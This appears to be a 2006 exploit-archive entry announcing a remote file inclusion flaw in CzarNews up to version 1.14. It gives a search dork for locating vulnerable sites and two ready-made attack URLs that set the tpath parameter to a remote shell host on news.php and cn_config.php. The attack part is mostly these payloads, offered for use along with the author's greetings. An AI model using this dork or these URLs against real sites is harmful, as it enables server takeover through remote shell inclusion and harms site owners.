id: 577
date: 07/12/2006
title: CzarNews <= 1.14 (tpath) Remote File Inclusion Vulnerability
author: SHiKaA
cves: 

============================================================
CzarNews <= 1.14 (tpath) Remote File Inclusion Vulnerability
============================================================



=================================================================
CzarNews <= (tpath) Remote File Inclusion Exploit
================================================================
                                                                |
Critical Level : Dangerous                                       |
                                                                |
=================================================================
Dork :  "CzarNews v1.12 " | "CzarNews v1.13" | "CzarNews v1.14 "

http://sitename.com/news.php?tpath=http://SHELLURL.COM?
http://sitename.com/cn_config.php?tpath=http://SHELLURL.COM?

===============================================================================
Discoverd By : SHiKaA

Conatact : SHiKaA-[at]hotmail.com

GreetZ : Semsemmasr Black_Scorpion Medo_Ye7ya Kambaa  NANA METO7575 Gendiaaa Saw SnIpEr_Sa Masry OSA FEGLA 3amer
=================================================================



#  0day.today [2023-03-26]  #